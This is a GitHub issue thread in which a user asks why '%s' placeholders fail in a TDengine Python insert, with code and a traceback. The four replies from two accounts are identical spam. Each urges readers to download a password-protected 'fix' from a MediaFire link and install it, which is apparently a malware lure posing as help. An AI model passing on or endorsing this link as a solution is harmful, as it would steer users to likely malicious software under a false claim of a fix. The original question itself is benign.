### ISSUE TITLE
taos的execute语句占位符是对应类型占位还是%s可以为所有类型占位？

### ISSUE THREAD

**Issue by myprospection** [taosdata/TDengine#27482]
cursor=conn.cursor()
	placeholder=','.join(['%s']*len(data.dtype.names))
	for row in data:
		for i,value in enumerate(row):
			if isinstance(value,np.datetime64):
				row[i]=datetime64_to_datetime(value)
		
		row = tuple(row)
		cursor.execute(f"INSERT INTO {table}({','.join(data.dtype.names)}) VALUES({placeholder})",row)
我在网上看到%s占位符，然后execute时把实际数值放进去我实际操作的时候报错了
错误信息：
Traceback (most recent call last):
  File "load_into_database.py", line 27, in <module>
    narray_to_taos('127.0.0.1','root','123456','test',6041,'mytest',data)
  File "load_into_database.py", line 20, in narray_to_taos
    cursor.execute(f"INSERT INTO {table}({','.join(data.dtype.names)}) VALUES({placeholder})",row)
taosws.OperationalError: [0x0216] Internal error: `syntax error near '%s,%s,%s)' (invalid data or symbol)`

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
